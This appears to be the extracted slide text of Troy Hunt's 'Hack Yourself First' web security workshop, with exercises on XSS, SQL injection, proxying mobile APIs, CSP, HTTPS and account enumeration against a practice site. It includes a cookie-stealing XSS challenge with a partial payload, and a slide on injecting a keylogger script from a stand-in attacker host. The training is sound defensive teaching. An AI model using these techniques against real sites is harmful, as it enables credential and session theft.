1. Troy Hunt @troyhunt troyhunt.com troyhunt@hotmail.com
Hack Yourself First
Troy Hunt
@troyhunt
troyhunt.com

2. We’re gonna turn you into lean, mean hacking machines!

3. Because if we don’t, these kids are going to hack you
Jake Davies, 19
(and his mum)
Ryan Cleary, 20
(and his mum)
Curtis Gervais, 16, awaiting trial
(probably with his mum)

4. Who are we protecting our assets from?
Hacker Resources
Super Hackers
$10.8B
per annum
Common Thieves
Can invest where ROI makes sense
Bored kids
Pocket money
Hacker Competency

5. Your Hacker Tools for Today
A Wi-Fi connection
A mobile device you can configure a proxy on
I have a few spares
Google Chrome
Or another browser with good dev tools
Fiddler – getfiddler.com
Or another HTTP proxy like charlesproxy.com

6. What we’ll be covering on day 1
Introduction – 30 mins
09:00
Discovering risks via the browser – 30 mins
09:30
Using an HTTP proxy – 30 mins
10:00
Break – 15 mins
10:30
XSS – 50 mins
10:45
SQL injection part 1 – 55 mins
11:35
Lunch – 1 hour
12:30
Mobile APIs – 60 mins
13:30
Content Security Policy – 50 mins
14:30
15:20
Account Enumeration – 30 mins
15:35
HTTPS – 55 mins
16:05
Close
17:00

7. Discovering risks via the browser
Exercise 1
Discovering risks via the browser

8. Exercise 1 – Chrome developer tools
Familiarise yourself with the dev tools
Elements, network, cookies, console, por… uh, incognito
Create an account at hackyourselffirst.troyhunt.com
Hacker Challenge 1:
Identify three security risks with the registration process

9. Exercise 2
Using an HTTP proxy

10. Exercise 2 – Using an HTTP proxy
Familiarise yourself with Fiddler
Watch requests and their headers, review response body and headers, use the composer to reissue request
Hacker Challenge 2:
Use Fiddler to vote multiple times on 1 car with your ID

11. Reflected cross site scripting (XSS)
Exercise 3
Reflected cross site scripting (XSS)

12. Understanding XSS
mysite.com/?q=<script>alert('Yay XSS!');</script>
mysite.com/?q=ferrari
<p>You searched for <%= Request.QueryString["q"] %></p>
<p>You searched for <script>alert('Yay XSS!');</script></p>
<p>You searched for ferrari</p>

13. Some quick XSS tips Check the encoding context
You encode for HTML differently than for JavaScript
Check the encoding consistency
Often it’s manual and some characters are not encoded
Play with JavaScript to:
Manipulate the DOM, access cookies, load external resources

14. Exercise 3 – XSS Establish the encoding practices on the search page
What’s encoded, what’s not, what contexts are encoding
What can be accessed or manipulated in the DOM
Hacker Challenge 3:
Create an XSS attack that sends the auth cookie to another site

15. Exercise 3 solution
');document.location='

16. Exercise 4
SQL injection (SQLi)

17. Understanding SQLi mysite.com/?id=foo mysite.com/?id=1
var query = "SELECT * FROM Widget WHERE Id = "
query += Request.Query["id"]
SELECT * FROM Widget WHERE Id = foo
SELECT * FROM Widget WHERE Id = 1
Invalid column name 'foo'

18. Some quick SQLi tips Think of SQL commands which disclose structure
sys.tables, sys.columns, system commands
Consider how you’d enumerate through records
Select top x rows asc then top 1 rows from that desc
Write out how you think the query works internally
SELECT * FROM Supercar ORDER BY [URL param]

19. Exercise 4 – SQLi Explore the database using error-based SQLi
Construct strings to disclose internal data
Cast things to invalid types to disclose via exceptions
Hacker Challenge 4:
Discover the version of the DB

20. Exercise 4 solution http://hackyourselffirst.troyhunt.com/Make/1

21. Exercise 5
Mobile APIs

22. Understanding mobile APIs

23. Who are we protecting our APIs from?
HTTP(S)
Attacker
Attacker

25. Trusting the Fiddler root cert

26. Some quick mobile API tips
Look at the HTTP requests for sensitive data
Credentials, account info, PII
Remove the proxy’s root cert and make HTTPS requests
Is cert validation actually enabled in the app?
In your own apps:
Parameter tampering, auth bypass, direct object refs

27. Exercise 5 – Mobile APIs Proxy your device through Fiddler or Charles
Inspect the traffic of your apps
Perform normal activities and monitor requests
Hacker Challenge 5:
Find three “things of interest” – doesn’t have to be security related

28. Exercise 6
FiddlerScript

29. Understanding FiddlerScript
Highlight particular request / response patterns
Modify requests or responses in transit
Good representation of what can be done with intercepted traffic
Also great for causing apps to “misbehave”!

30. Some quick FiddlerScript tips
Make good use of the FiddlerScript CookBook
Google it – first result
Wrap conditions around response parsing for better perf
Host name / path / content type / method
Don’t forget to hit the “Save Script” button!
Plus debugging can be painful…

31. Exercise 6 – FiddlerScript
Modify the traffic returned to your app
Identify request / response patterns of an app
Manipulate request / response to cause misbehaviour
Hacker Challenge 6:
Proxy your mobile device and cause one of your apps to do something… “interesting”

32. Content Security Policy (CSP)
Exercise 7
Content Security Policy (CSP)

33. Without a CSP
Anything can be added to the page via a reflected XSS risk
Anything can be added to the DOM downstream of the server
…and you have no idea when this one is happening!

34. With a CSP The browser will only load resources you white-list
Local resources
Remote resources
Any violations can be reported
If you’re nervous, you always just report and not block

35. Some quick CSP tips
Create a white list of what should be allowed to run
Start with nothing and see what breaks
In development!
Use the report feature to track exceptions
You’ll learn some interesting things…

36. Exercise 7 – CSP Falafel needs help! Hacker Challenge 7:
They have no CSP and they’re a financial institution!
We can add one ourselves in transit
Hacker Challenge 7:
Write a CSP for a site and embed it using FiddlerScript

37. Injecting the CSP header
if (oSession.HostnameIs(" {
oSession.oResponse.headers["Content-Security-Policy"] = …; }

38. Exercise 8
HTTPS

39. Understanding HTTPS
Confidentiality
Integrity
Authenticity

40. Some quick HTTPS tips
Consider everything sent over HTTP to be compromised
Sometimes that won’t matter… much
Also look at HTTPS content embedded in untrusted pages
Iframes
Links to HTTPS

41. Exercise 8 – HTTPS You can’t trust insecure login forms!
The form can be manipulated in transit
Manipulate it to capture the “secure” credentials in transit
Hacker Challenge 8:
Inject a JavaScript keylogger into an insecure login page using Fiddler script

42. Injecting the keylogger
evilcyberhacker.com/keylogger.js
Set the “destination” JavaScript variable

43. Exercise 9
Account enumeration

44. Understanding account enumeration
Does have an account? No
Does have an account? No
Does have an account?
Yes

45. Some quick account enumeration tips
There are usually multiple vectors for identifying the existence of an account
There may or may not be anti-automation defence
And it may be inconsistent across vectors
It may or may not even matter…
Very dependent on the nature

46. Exercise 9 – Account enumeration
Identify vectors for account enumeration
Think about how to “ask” the site about an account
Identify positive versus negative responses
Hacker Challenge 9:
Identify 3 sites you use that disclose the presence of your account